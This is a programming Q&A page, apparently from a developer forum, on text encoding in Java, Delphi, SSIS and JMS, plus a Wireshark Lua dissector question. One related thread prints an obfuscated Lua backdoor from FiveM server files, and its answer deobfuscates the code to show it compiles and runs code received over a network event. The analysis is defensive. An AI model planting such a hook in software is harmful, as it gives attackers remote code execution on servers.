What should the JCA deployment descriptor (ra.xml) character encoding be?

Looking through the JCA 1.7 specification, the only mention I could find is in one of its examples of a Resource Adapter Deployment Descriptor (Chapter 13: Message Inflow, p. 13-50), which opens with the following XML declaration:
<?xml version="1.0" encoding="UTF-8"?>
This example shows the usage of UTF-8 encoding; however, nothing says whether this was an optional choice for the sake of illustration or a mandatory restriction on the file's character encoding.
I'm asking this because I'm writing a Java program to read one of these files and FindBugs™ is giving me this message:
DM_DEFAULT_ENCODING: Reliance on default encoding
Found a call to a method which will perform a byte to String (or String to byte) conversion, and will assume that the default platform encoding is suitable. This will cause the application behaviour to vary between platforms. Use an alternative API and specify a charset name or Charset object explicitly.
Line 4 in this Java code snippet is where the character encoding would be specified:
01. byte[] contents = new byte[1024];
02. int bytesRead = 0;
03. while ((bytesRead = bin.read(contents)) != -1)
04. result.append(new String(contents, 0, bytesRead));
So, is it possible to specify the expected encoding of this file in this case or not?

From what I've seen, most people use UTF-8 encoding for their ra.xml. However, there is no restriction against using other encodings, so if you base your parsing on expecting UTF-8 only, the result might not be what you expect.
So you either need to account for this in your code when you read the file as plain text, or read it as an XML file and save yourself the headache; an XML parser picks up the encoding from the file itself. I don't think the difference in performance will be an issue, because ra.xml files do not usually grow to gigabytes; at least the ones I've seen so far average a few megabytes.
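For instance, a minimal sketch of the XML route using the standard JAXP DOM parser (the file path is a placeholder); the parser works out the encoding on its own from the XML declaration or byte-order mark:
import java.io.File;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;

public class RaXmlReader {
    public static void main(String[] args) throws Exception {
        // The parser detects the file's encoding from the XML declaration
        // (or a BOM), so no charset needs to be hard-coded here.
        Document doc = DocumentBuilderFactory.newInstance()
                .newDocumentBuilder()
                .parse(new File("ra.xml"));
        System.out.println(doc.getDocumentElement().getTagName());
    }
}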
For the FindBugs issue, you just need to specify the encoding as UTF-8. Otherwise you will be using the JVM default, which is determined during virtual-machine startup and typically depends on the locale and charset of the underlying operating system. Although relying on the default is not recommended here, if that is what you want, then specify the default encoding explicitly; that will get rid of the FindBugs warning.
So your code would look something like this (Charset being java.nio.charset.Charset):
byte[] contents = new byte[1024];
int bytesRead = 0;
while ((bytesRead = bin.read(contents)) != -1)
    result.append(new String(contents, 0, bytesRead, Charset.defaultCharset()));
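Note that decoding fixed-size byte chunks like this can split a multi-byte character across two reads and corrupt it. A safer sketch (assuming Java 7+ for StandardCharsets, and the same bin stream as above) wraps the stream in a Reader with an explicit charset:
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.nio.charset.StandardCharsets;

// Decode the stream as UTF-8; the Reader correctly handles multi-byte
// sequences that span buffer boundaries, unlike chunk-wise new String(...).
BufferedReader reader = new BufferedReader(
        new InputStreamReader(bin, StandardCharsets.UTF_8));
StringBuilder result = new StringBuilder();
char[] chunk = new char[1024];
int charsRead;
while ((charsRead = reader.read(chunk)) != -1)
    result.append(chunk, 0, charsRead);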

FindBugs just warns you that you're relying on the default system encoding, so if your application is launched by another user in another country, you might get unexpected results. It's better to specify explicitly which encoding you want to use.
In your case the actual encoding should be extracted from the XML file itself. There are several ways to get it; one method is to use XMLStreamReader as described in this answer.
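A minimal sketch along those lines (the file name is a placeholder): XMLStreamReader exposes both the encoding declared in the prolog and the one actually detected from the bytes:
import java.io.FileInputStream;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamReader;

public class EncodingSniffer {
    public static void main(String[] args) throws Exception {
        XMLStreamReader xml = XMLInputFactory.newInstance()
                .createXMLStreamReader(new FileInputStream("ra.xml"));
        // Encoding declared in the <?xml ... ?> prolog, or null if absent.
        System.out.println(xml.getCharacterEncodingScheme());
        // Encoding auto-detected from the byte stream (e.g. via a BOM).
        System.out.println(xml.getEncoding());
        xml.close();
    }
}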

Related

Does this line of Lua code contain any malicious activities?

While looking at some server files (FiveM/GTA RP server files) my friend sent me, I found a line of code that was placed all over the server's resources. Is it malicious? After running it through a "Hex to ASCII Text String Converter", it looks like it might be an attempt to inject some code into the Lua environment. The code creates a table with several strings that are encoded in hexadecimal format. These strings are then used to access elements in the global environment (_G) and call them as functions. The code also sets up an event listener for the "load" event, which could indicate that the code is intended to run when a specific event occurs in the environment.
Code:
local ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG = {"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64",_G}
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[1]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2])
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[3]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[2],
function(BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn)
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[4]](ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[6][ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG[5]](BFWCBOOqrwrVwzdmKcQZBRMziBAgjQbWLfBPFXhZUzCWlOjKNLUGOYvDisfytJZwIDtHyn))()
end)
ysoGcfkdgEuFekRkklJGSmHogmpKPAiWgeIRhKENhusszjvprBCPXrRqVqLgSwDqVqOiBG is just a variable name. It's not a very nice one, but it is just a variable name.
{"\x52\x65\x67\x69\x73\x74\x65\x72\x4e\x65\x74\x45\x76\x65\x6e\x74","\x68\x65\x6c\x70\x43\x6f\x64\x65","\x41\x64\x64\x45\x76\x65\x6e\x74\x48\x61\x6e\x64\x6c\x65\x72","\x61\x73\x73\x65\x72\x74","\x6c\x6f\x61\x64"}
is the table:
{"RegisterNetEvent", "helpCode", "AddEventHandler", "assert", "load"}
with the bytes encoded as hex bytes rather than literal characters.
This deobfuscates to:
local funcs = {
"RegisterNetEvent",
"helpCode",
"AddEventHandler",
"assert",
"load",
_G
};
funcs[6][funcs[1]](funcs[2]);
funcs[6][funcs[3]](funcs[2], function(param)
(funcs[6][funcs[4]](funcs[6][funcs[5]](param)))();
end);
Tables in Lua are 1-indexed, so this further deobfuscates to
_G["RegisterNetEvent"]("helpCode");
_G["AddEventHandler"]("helpCode", function(param)
(_G["assert"](_G["load"](param)))();
end);
And could be simplified to
RegisterNetEvent("helpCode")
AddEventHandler("helpCode", function(param)
assert(load(param))()
end)
While it doesn't look blatantly malicious, it does appear to directly compile and invoke raw code received via the "helpCode" network event, which is certainly dangerous if it's used maliciously. It's possible that this is part of some funny dynamic plugin system, but it's equally possible that it's a backdoor designed to give a network attacker command-and-control over the process.
load is not an event, but the global function used to compile code from a string. This essentially causes the script to listen for a helpCode network event, take whatever payload arrives with it, compile it as Lua code, and execute it. Given that it doesn't even attempt to sandbox the load'd code, I wouldn't run this without a very comprehensive understanding of how it's being used.

How to use add_packet_field in a Wireshark Lua dissector?

I am stumbling my way through writing a dissector for our custom protocol in Lua. While I have basic field extraction working, many of our fields have scale factors associated with them. I'd like to present the scaled value in addition to the raw extracted value.
It seems to me tree_item:add_packet_field is tailor-made for this purpose. Except I can't get it to work.
I found Mika's blog incredibly helpful, and followed his pattern for breaking my dissector into different files, etc. That's all working.
Given a packet type "my_packet", I have a 14-bit signed integer "AOA" that I can extract just fine
local pref = "my_packet"
local m = {
    aoa = ProtoField.new("AOA", pref .. ".aoa", ftypes.INT16, nil, base.DEC, 0x3FFF, "angle of arrival measurement"),
}
local option = 2
local aoa_scale = 0.1
function m.parse(tree_arg, buffer)
    if option == 1 then
        -- Basic field extraction. This works just fine: the field is
        -- extracted and added to the tree.
        tree_arg:add(m.aoa, buffer)
    elseif option == 2 then
        -- This parses and runs. The item is decoded and added to the tree,
        -- but the value of 'v' is always nil.
        local c, v = tree_arg:add_packet_field(m.aoa, buffer, ENC_BIG_ENDIAN)
        -- This results in an error: doing arithmetic on 'nil'.
        c:append_text(" (scaled= " .. tostring(v * aoa_scale) .. ")")
    end
end
(I use ProtoField.new instead of any of the type-specific variants for consistency in declaring my fields)
The documentation for add_packet_field says that the encoding argument is mandatory.
There is a README in the source code that says ENC_BIG_ENDIAN should be specified for network byte-order data (mine is). I know that section is for proto_tree_add_item, but I traced the code far enough to see that add_packet_field ends up passing the encoding to proto_tree_add_item.
Basically, at this point, I'm lost. I did find this post from 2014 that suggested limited support for add_packet_field, but surely by now something as basic as an integer value is supported?
Also, I do know how to declare a Field and extract the value after tree:add does the parsing; worst case I'll fall back to that, but surely there is a more expedient way to access the just-parsed value added to the tree?
Wireshark Version
3.2.4 (v3.2.4-0-g893b5a5e1e3e)
Compiled (64-bit) with Qt 5.12.8, with WinPcap SDK (WpdPack) 4.1.2, with GLib
2.52.3, with zlib 1.2.11, with SMI 0.4.8, with c-ares 1.15.0, with Lua 5.2.4,
with GnuTLS 3.6.3 and PKCS #11 support, with Gcrypt 1.8.3, with MIT Kerberos,
with MaxMind DB resolver, with nghttp2 1.39.2, with brotli, with LZ4, with
Zstandard, with Snappy, with libxml2 2.9.9, with QtMultimedia, with automatic
updates using WinSparkle 0.5.7, with AirPcap, with SpeexDSP (using bundled
resampler), with SBC, with SpanDSP, with bcg729.
Running on 64-bit Windows 10 (1803), build 17134, with Intel(R) Xeon(R) CPU
E3-1505M v6 @ 3.00GHz (with SSE4.2), with 32558 MB of physical memory, with
locale English_United States.1252, with light display mode, without HiDPI, with
Npcap version 0.9991, based on libpcap version 1.9.1, with GnuTLS 3.6.3, with
Gcrypt 1.8.3, with brotli 1.0.2, without AirPcap, binary plugins supported (19
loaded).
Built using Microsoft Visual Studio 2019 (VC++ 14.25, build 28614).
Looking at the try_add_packet_field() source code, only certain FT_ types are supported, namely:
FT_BYTES
FT_UINT_BYTES
FT_OID
FT_REL_OID
FT_SYSTEM_ID
FT_ABSOLUTE_TIME
FT_RELATIVE_TIME
None of the other FT_ types are supported [yet], including FT_INT16, which is the one you're interested in here (ftypes.INT16), i.e., anything else just needs to be done the old-fashioned way, as sketched below.
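For reference, a sketch of that old-fashioned way, reusing the names from the question: declare a Field extractor up front, let tree:add do the parsing, then read the freshly parsed value back and append the scaled text.
-- Must be created at script load time, before dissection starts.
local aoa_field = Field.new("my_packet.aoa")

function m.parse(tree_arg, buffer)
    local item = tree_arg:add(m.aoa, buffer)
    -- The extractor now yields a FieldInfo for the value just added.
    local fi = aoa_field()
    if fi then
        item:append_text(" (scaled= " .. tostring(fi.value * aoa_scale) .. ")")
    end
end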
If you'd like this to be implemented, I'd suggest filing a Wireshark enhancement bug request for this over at the Wireshark Bug Tracker.

Default TEncoding.UTF8 discarding invalid blocks of data in TStreamReader input

I'm using a TStreamReader to read data from a file that purports to be UTF-8. I have no problem reading the file until it comes to a section containing what appears to be a UTF-8 "£" symbol with the preceding xC2 byte missing - the file only contains the xA3 part of the character. I've traced this through the run-time library until it calls
Result := UnicodeFromLocaleChars(FCodePage, FMBToWCharFlags,
PAnsiChar(Bytes), ByteCount, nil, 0);
which returns 0, indicating that it doesn't like the input. Unfortunately the TStreamReader simply ends up discarding this buffer of input and then continues with the rest of the file without raising an error. This is extremely misleading about what the problem is, but that is just a side issue.
The issue appears to be a "defect" in the UTF-8 TEncoding class in that it simply discards the results of a failed conversion whilst the TStreamReader assumes that this isn't the behaviour of TEncoding.
I can work around this by using
Reader := TStreamReader.Create(FileStream, TMBCSEncoding.Create(CP_UTF8, 0, 0));
instead of
Reader := TStreamReader.Create(FileStream, TEncoding.UTF8);
as this makes it ignore the corrupt UTF-8 and simply include something (I haven't checked what) in my output. However, I would like to combine allowing the data through with reporting it, and there doesn't seem to be any obvious way of doing this, as the behaviour is hidden deep within the library.
Does anyone know of any standard Delphi library tools for doing this or do I need to resort to a lot of custom code?

Avoiding SSIS script task to convert utf-8 to unicode for AS400 data to SQL Server

After many tries I have concluded that the optimal way to transfer data with SSIS from AS400 (non-Unicode) to SQL Server is:
1. Use the native transfer utility to dump data to tsv (tab-delimited) files
2. Convert the files from UTF-8 to Unicode
3. Use bulk insert to load them into SQL Server
In step #2 I found ready-made code that does this:
string from = @"\\appsrv02\c$\bg_f0101.tsv";
string to = @"\\appsrv02\c$\bg_f0101.txt";
using (StreamReader reader = new StreamReader(from, Encoding.UTF8, false, 1000000))
using (StreamWriter writer = new StreamWriter(to, false, Encoding.Unicode, 1000000))
{
    while (!reader.EndOfStream)
    {
        var line = reader.ReadLine();
        if (line.Length > 0)
            writer.WriteLine(line);
    }
}
I need to fully understand what is happening here with the encoding and why this is necessary.
How can I replace this script task with a more elegant solution?
I don't have much insight into exactly why you need the UTF-8 conversion task, except to say that SQL Server - I believe - uses UCS-2 as its native storage format, and this is similar to UTF-16, which is what your task converts the file to. I'm surprised SSIS can't work with a UTF-8 input source, though.
My main point is to answer the "How could I replace this script task with a more elegant solution?":
I have had a lot of success using HiT OLEDB/400 Server. It allows you to set up your AS/400 / iSeries / System i / whatever IBM are calling it this week as a linked server in SQL Server, and you can then access the 400's data directly from the SQL Server it's linked to using the standard four-part syntax, e.g. SELECT * FROM my400.my400.myLib.myFile.
Or even better, it's much more efficient as a passthrough query using EXEC...AT.
Using this you would not need SSIS at all; you'd just need a simple stored proc that does an insert into your destination table directly from the 400's data.
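For example, a hypothetical passthrough insert along those lines (the linked-server, library, and table names are placeholders; EXEC ... AT requires the linked server's "RPC Out" option to be enabled):
-- Runs the query on the AS/400 itself and inserts the rows locally.
INSERT INTO dbo.MyDestinationTable
EXEC ('SELECT * FROM myLib.myFile') AT my400;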

Encoding a JMS TextMessage

I'm receiving messages from a JMS MQ queue which are supposedly UTF-8 encoded. However, on reading them out using msgText = ((TextMessage)msg).getText();
I get question marks where non-standard characters were present. It seems possible to specify the encoding when using a BytesMessage, but I can't find a way to specify the encoding while reading out a TextMessage. Is there a way to solve this, or should I press for BytesMessages?
We tried adding -Dfile.encoding=UTF-8 to WebSphere's JVM arguments, and we added
source = new StreamSource(new ByteArrayInputStream(
((TextMessage) msg).getText().getBytes("UTF-8")));
in our MessageListener. This worked for us, so we then took the -Dfile.encoding bit away and it still worked.
Due to the preferred minimum configuration for WebSphere we decided to leave it this way, also taking into account that we can more easily switch the UTF-8 string to a setting read from a file or database.
If the text is not decoded correctly, then probably the client is not sending the message with the UTF-8 codec; this should work:
// Re-encode the mis-decoded string back to its original bytes
// (ISO-8859-1 maps every char 0x00-0xFF back to the same byte value),
byte[] by = ((TextMessage) msg).getText().getBytes("ISO-8859-1");
// then decode those bytes as the UTF-8 they actually contain.
String text = new String(by, "UTF-8");
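If you do end up pressing for BytesMessages, a minimal sketch of reading one with an explicit charset (standard JMS API; the helper method name is mine):
import java.nio.charset.StandardCharsets;
import javax.jms.BytesMessage;
import javax.jms.JMSException;
import javax.jms.Message;

public static String readBody(Message msg) throws JMSException {
    BytesMessage bytesMsg = (BytesMessage) msg;
    byte[] body = new byte[(int) bytesMsg.getBodyLength()];
    bytesMsg.readBytes(body);
    // Decode explicitly instead of relying on any provider default.
    return new String(body, StandardCharsets.UTF_8);
}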
